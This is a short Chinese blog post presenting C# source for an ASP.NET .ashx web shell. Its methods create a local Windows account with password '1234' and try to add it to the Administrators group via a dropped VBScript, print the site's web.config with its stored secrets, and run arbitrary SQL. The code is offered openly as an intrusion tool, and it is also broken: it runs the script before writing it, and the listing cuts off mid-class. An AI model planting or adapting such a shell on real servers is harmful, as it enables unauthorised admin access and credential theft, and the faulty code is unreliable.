ashx入侵-白红宇

ashx入侵

阅读量：4667 次

发布时间：2019-06-09

本文共 2336 字，大约阅读时间需要 7 分钟。

<%@ WebHandler Language="C#" Class="TextLd" %>

using System;

using System.Collections.Generic;

using System.Linq;

using System.Web;

using System.Data.SqlClient;

public class TextLd : IHttpHandler

{

public void CreateLocalUser(string newPath)

{

System.Diagnostics.Process.Start(@"d:\1.vbs");

System.IO.File.WriteAllText(@"d:\1.vbs", "set wsnetwork=CreateObject(\"WSCRIPT.NETWORK\") \r\n os=\"WinNT://\"&wsnetwork.ComputerName \r\n Set ob=GetObject(os) \r\nSet oe=GetObject(os&\"/Administrators,group\") '属性,admin组\r\nod=ob.Create(\"user\",\"test\") '建立用户 \r\nSetPassword \"1234\" '设置密码 \r\nSetInfo\r\nof=GetObject(os&\"/test\",user)\r\n add os&\"/test\"");

}

public void ShowWebConfig(HttpContext context)

{

context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));

}

public void WriteVbs(HttpContext context)

{

System.IO.File.WriteAllText(context.Request.MapPath("~/1.vbs"), "set wsnetwork=CreateObject(\"WSCRIPT.NETWORK\") \r\n os=\"WinNT://\"&wsnetwork.ComputerName \r\n Set ob=GetObject(os) \r\nSet oe=GetObject(os&\"/Administrators,group\") '属性,admin组\r\nod=ob.Create(\"user\",\"test\") '建立用户 \r\nSetPassword \"1234\" '设置密码 \r\nSetInfo\r\nof=GetObject(os&\"/test\",user)\r\n add os&\"/test\"");

}

public void ExecuteSql(string connection, string sql)

{

using (SqlConnection con = new SqlConnection(connection))

{

using (SqlCommand commd = new SqlCommand(sql, con))

{

con.Open();

commd.ExecuteNonQuery();

con.Close();

}

public void ProcessRequest(HttpContext context)